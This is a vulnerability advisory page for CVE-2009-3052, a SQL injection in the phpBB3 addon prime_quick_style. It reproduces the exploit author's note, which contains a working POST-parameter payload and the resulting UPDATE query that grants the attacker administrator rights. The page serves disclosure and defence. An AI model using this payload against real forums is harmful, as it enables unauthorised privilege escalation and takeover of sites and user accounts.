phpBB3 addon prime_quick_style GetAdmin Vulnerability

2009-09-04 / 2009-09-05
Credit: SmoG
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-3052
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############# # # phpBB3 addon prime_quick_style GetAdmin Exploit # # Vulnerability found and exploited by -SmoG- # # target file: prime_quick_style.php # # # vuln: POST parameter "prime_quick_style" is injectable. # source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625 # # HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter. # example: prime_quick_style = "5,user_type = 3, user_permissions = ''" # # query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId" # # gratz, now u will be an admin :) # # --- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! --- # # # -( by -SmoG- )- #############

References:

http://www.securityfocus.com/bid/36214
http://www.phpbb.com/community/viewtopic.php?f=70&t=692625&start=150#p10649315
http://www.milw0rm.com/exploits/9569
http://www.absoluteanime.com/forum/mods/Prime%20Quick%20Style/install.xml
http://secunia.com/advisories/36532


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top